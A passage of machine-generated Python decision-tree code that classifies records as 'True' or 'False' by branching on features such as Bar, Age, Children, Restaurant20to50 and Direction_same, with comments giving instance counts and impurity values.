# {"feature": "Bar", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[8]<=1.0:
return 'False'
else: return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[8]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Restaurant20to50", "instances": 29, "metric_value": 0.2436, "depth": 9}
if obj[10]>0.0:
# {"feature": "Age", "instances": 22, "metric_value": 0.1364, "depth": 10}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.3571, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4082, "depth": 12}
if obj[5]<=1:
# {"feature": "Bar", "instances": 7, "metric_value": 0.4082, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Age", "instances": 7, "metric_value": 0.4048, "depth": 10}
if obj[4]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[11]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=1:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[4]>1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 75, "metric_value": 0.3032, "depth": 8}
if obj[11]<=0:
# {"feature": "Age", "instances": 49, "metric_value": 0.3718, "depth": 9}
if obj[4]>1:
# {"feature": "Education", "instances": 32, "metric_value": 0.2949, "depth": 10}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 21, "metric_value": 0.3048, "depth": 11}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 20, "metric_value": 0.3059, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 17, "metric_value": 0.3588, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
elif obj[10]>2.0:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Bar", "instances": 11, "metric_value": 0.1558, "depth": 11}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[5]<=1:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.2075, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1667, "depth": 11}
if obj[6]<=0:
return 'False'
elif obj[6]>0:
# {"feature": "Children", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[5]>0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 8, "metric_value": 0.1667, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[6]<=1:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 26, "metric_value": 0.0513, "depth": 9}
if obj[4]<=6:
return 'True'
elif obj[4]>6:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[6]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Age", "instances": 1186, "metric_value": 0.4269, "depth": 6}
if obj[4]<=4:
# {"feature": "Occupation", "instances": 902, "metric_value": 0.4416, "depth": 7}
if obj[7]<=19.215025871277074:
# {"feature": "Bar", "instances": 839, "metric_value": 0.4514, "depth": 8}
if obj[8]<=1.0:
# {"feature": "Restaurant20to50", "instances": 442, "metric_value": 0.4284, "depth": 9}
if obj[10]>0.0:
# {"feature": "Education", "instances": 389, "metric_value": 0.4434, "depth": 10}
if obj[6]>0:
# {"feature": "Time", "instances": 301, "metric_value": 0.427, "depth": 11}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 239, "metric_value": 0.4395, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 128, "metric_value": 0.4647, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Children", "instances": 111, "metric_value": 0.4061, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Children", "instances": 62, "metric_value": 0.3511, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 36, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 26, "metric_value": 0.4527, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Time", "instances": 88, "metric_value": 0.4569, "depth": 11}
if obj[1]<=1:
# {"feature": "Children", "instances": 47, "metric_value": 0.4875, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 33, "metric_value": 0.4992, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4589, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Children", "instances": 41, "metric_value": 0.4131, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.3936, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 19, "metric_value": 0.432, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Children", "instances": 53, "metric_value": 0.267, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 45, "metric_value": 0.22, "depth": 11}
if obj[6]<=0:
# {"feature": "Time", "instances": 25, "metric_value": 0.313, "depth": 12}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.3398, "depth": 13}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[6]>0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.0909, "depth": 12}
if obj[11]<=0:
# {"feature": "Time", "instances": 11, "metric_value": 0.1515, "depth": 13}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Time", "instances": 8, "metric_value": 0.1875, "depth": 11}
if obj[1]>1:
return 'True'
elif obj[1]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.0, "depth": 12}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 397, "metric_value": 0.4662, "depth": 9}
if obj[5]<=0:
# {"feature": "Education", "instances": 286, "metric_value": 0.4792, "depth": 10}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 268, "metric_value": 0.4734, "depth": 11}
if obj[10]>0.0:
# {"feature": "Time", "instances": 220, "metric_value": 0.4631, "depth": 12}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 162, "metric_value": 0.4722, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 58, "metric_value": 0.4056, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Time", "instances": 48, "metric_value": 0.4872, "depth": 12}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 39, "metric_value": 0.4962, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[6]>3:
# {"feature": "Restaurant20to50", "instances": 18, "metric_value": 0.4444, "depth": 11}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.3704, "depth": 12}
if obj[11]<=0:
# {"feature": "Time", "instances": 9, "metric_value": 0.4333, "depth": 13}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 12}
if obj[11]>0:
# {"feature": "Time", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[1]<=0:
return 'True'
elif obj[1]>0:
return 'False'
else: return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[5]>0:
# {"feature": "Time", "instances": 111, "metric_value": 0.4132, "depth": 10}
if obj[1]<=2:
# {"feature": "Education", "instances": 78, "metric_value": 0.3605, "depth": 11}
if obj[6]>1:
# {"feature": "Restaurant20to50", "instances": 50, "metric_value": 0.275, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 35, "metric_value": 0.2, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>2.0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.3889, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Restaurant20to50", "instances": 28, "metric_value": 0.4194, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4563, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.2922, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Restaurant20to50", "instances": 33, "metric_value": 0.465, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4843, "depth": 12}
if obj[11]<=0:
# {"feature": "Education", "instances": 12, "metric_value": 0.4583, "depth": 13}
if obj[6]>2:
return 'True'
elif obj[6]<=2:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 13}
if obj[6]<=2:
return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 16, "metric_value": 0.3875, "depth": 12}
if obj[6]<=4:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.3, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[6]>4:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>19.215025871277074:
# {"feature": "Education", "instances": 63, "metric_value": 0.2574, "depth": 8}
if obj[6]<=2:
# {"feature": "Bar", "instances": 55, "metric_value": 0.2055, "depth": 9}
if obj[8]<=2.0:
# {"feature": "Time", "instances": 46, "metric_value": 0.1528, "depth": 10}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 33, "metric_value": 0.2048, "depth": 11}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.1046, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 9, "metric_value": 0.1944, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 16, "metric_value": 0.2167, "depth": 12}
if obj[10]>0.0:
# {"feature": "Children", "instances": 15, "metric_value": 0.2222, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4, "depth": 10}
if obj[11]>0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[10]>1.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[10]>1.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>2:
# {"feature": "Time", "instances": 8, "metric_value": 0.3333, "depth": 9}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 10}
if obj[11]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Education", "instances": 284, "metric_value": 0.3594, "depth": 7}
if obj[6]<=0:
# {"feature": "Occupation", "instances": 165, "metric_value": 0.3, "depth": 8}
if obj[7]<=21:
# {"feature": "Time", "instances": 158, "metric_value": 0.2877, "depth": 9}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 132, "metric_value": 0.3122, "depth": 10}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 66, "metric_value": 0.2517, "depth": 11}
if obj[10]>0.0:
# {"feature": "Children", "instances": 59, "metric_value": 0.2805, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 58, "metric_value": 0.2853, "depth": 13}
if obj[8]<=1.0:
return 'True'
elif obj[8]>1.0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 66, "metric_value": 0.3588, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Bar", "instances": 49, "metric_value": 0.3222, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 30, "metric_value": 0.3578, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Children", "instances": 19, "metric_value": 0.2644, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 17, "metric_value": 0.4379, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Bar", "instances": 8, "metric_value": 0.3, "depth": 13}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Bar", "instances": 26, "metric_value": 0.1348, "depth": 10}
if obj[8]<=1.0:
# {"feature": "Restaurant20to50", "instances": 21, "metric_value": 0.0893, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 16, "metric_value": 0.1172, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.1172, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>21:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4048, "depth": 9}
if obj[11]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 10}
if obj[1]<=3:
return 'True'
elif obj[1]>3:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Time", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[1]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>0:
# {"feature": "Occupation", "instances": 119, "metric_value": 0.3986, "depth": 8}
if obj[7]<=13:
# {"feature": "Time", "instances": 112, "metric_value": 0.3981, "depth": 9}
if obj[1]<=2:
# {"feature": "Restaurant20to50", "instances": 76, "metric_value": 0.3388, "depth": 10}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 69, "metric_value": 0.3186, "depth": 11}
if obj[11]<=0:
# {"feature": "Bar", "instances": 36, "metric_value": 0.3577, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 26, "metric_value": 0.4253, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 10, "metric_value": 0.1667, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Bar", "instances": 33, "metric_value": 0.2414, "depth": 12}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 31, "metric_value": 0.2193, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4857, "depth": 11}
if obj[5]>0:
# {"feature": "Bar", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Bar", "instances": 36, "metric_value": 0.4214, "depth": 10}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 25, "metric_value": 0.384, "depth": 11}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 15, "metric_value": 0.28, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 10, "metric_value": 0.4444, "depth": 12}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4815, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4182, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 6, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>13:
# {"feature": "Time", "instances": 7, "metric_value": 0.1429, "depth": 9}
if obj[1]<=2:
return 'False'
elif obj[1]>2:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>2:
# {"feature": "Bar", "instances": 1390, "metric_value": 0.3797, "depth": 5}
if obj[8]<=3.0:
# {"feature": "Age", "instances": 1328, "metric_value": 0.3739, "depth": 6}
if obj[4]<=4:
# {"feature": "Occupation", "instances": 1062, "metric_value": 0.3836, "depth": 7}
if obj[7]>1:
# {"feature": "Education", "instances": 904, "metric_value": 0.3983, "depth": 8}
if obj[6]<=3:
# {"feature": "Time", "instances": 845, "metric_value": 0.4078, "depth": 9}
if obj[1]<=2:
# {"feature": "Restaurant20to50", "instances": 521, "metric_value": 0.3854, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 349, "metric_value": 0.4083, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 212, "metric_value": 0.3971, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 115, "metric_value": 0.3856, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 97, "metric_value": 0.4107, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 137, "metric_value": 0.4238, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 84, "metric_value": 0.4082, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 53, "metric_value": 0.4486, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 172, "metric_value": 0.3367, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 122, "metric_value": 0.3536, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 67, "metric_value": 0.3475, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 55, "metric_value": 0.361, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 50, "metric_value": 0.294, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.255, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Restaurant20to50", "instances": 324, "metric_value": 0.4372, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 211, "metric_value": 0.4177, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 119, "metric_value": 0.3993, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 60, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 59, "metric_value": 0.424, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 92, "metric_value": 0.4395, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 58, "metric_value": 0.4405, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 34, "metric_value": 0.4377, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 113, "metric_value": 0.4686, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 66, "metric_value": 0.4537, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 36, "metric_value": 0.4614, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 47, "metric_value": 0.4876, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 34, "metric_value": 0.4931, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.4734, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Restaurant20to50", "instances": 59, "metric_value": 0.2207, "depth": 9}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 43, "metric_value": 0.2925, "depth": 10}
if obj[3]>0:
# {"feature": "Time", "instances": 30, "metric_value": 0.3492, "depth": 11}
if obj[1]>0:
